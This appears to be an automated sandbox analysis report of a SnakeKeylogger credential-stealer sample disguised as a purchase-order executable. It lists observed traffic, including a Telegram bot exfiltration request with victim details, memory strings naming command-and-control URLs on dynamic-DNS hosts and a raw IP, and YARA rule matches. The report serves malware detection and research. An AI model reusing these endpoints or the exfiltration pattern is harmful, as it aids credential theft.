Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49710 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2001/10/2024%20/%2013:45:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: us2.smtp.mailhostbox.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 01 Oct 2024 05:21:13 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002AD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1350435179.000000000285E000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002AE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20a
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.00000000029FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.00000000029FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49728 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Purchase Order 007823-PO# 005307.exe

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 0_2_00B8D5BC	0_2_00B8D5BC
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 0_2_066D1DD8	0_2_066D1DD8
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 0_2_066D4268	0_2_066D4268
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 0_2_066D2210	0_2_066D2210
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 0_2_066D38B8	0_2_066D38B8
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_0296D278	6_2_0296D278
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_02965362	6_2_02965362
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_0296C146	6_2_0296C146
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_0296C738	6_2_0296C738
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_0296C468	6_2_0296C468
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_0296CA08	6_2_0296CA08
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_0296E988	6_2_0296E988
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_029669A0	6_2_029669A0
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_02963E09	6_2_02963E09
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_0296CFA9	6_2_0296CFA9
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_02966FC8	6_2_02966FC8
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_0296CCD8	6_2_0296CCD8
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_02969DE0	6_2_02969DE0
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_0296F630	6_2_0296F630
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_0296FA88	6_2_0296FA88
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_029629E0	6_2_029629E0
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 6_2_0296E97A	6_2_0296E97A

Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1355068640.0000000006A00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order 007823-PO# 005307.exe
Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1348177290.000000000076E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Purchase Order 007823-PO# 005307.exe
Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000000.1324301927.0000000000132000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameXpkT.exeF vs Purchase Order 007823-PO# 005307.exe
Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1350435179.000000000285E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Purchase Order 007823-PO# 005307.exe
Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1355716649.0000000007252000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Purchase Order 007823-PO# 005307.exe
Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order 007823-PO# 005307.exe
Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Purchase Order 007823-PO# 005307.exe
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Purchase Order 007823-PO# 005307.exe
Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3790025869.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Purchase Order 007823-PO# 005307.exe
Source: Purchase Order 007823-PO# 005307.exe	Binary or memory string: OriginalFilenameXpkT.exeF vs Purchase Order 007823-PO# 005307.exe

Source: Purchase Order 007823-PO# 005307.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
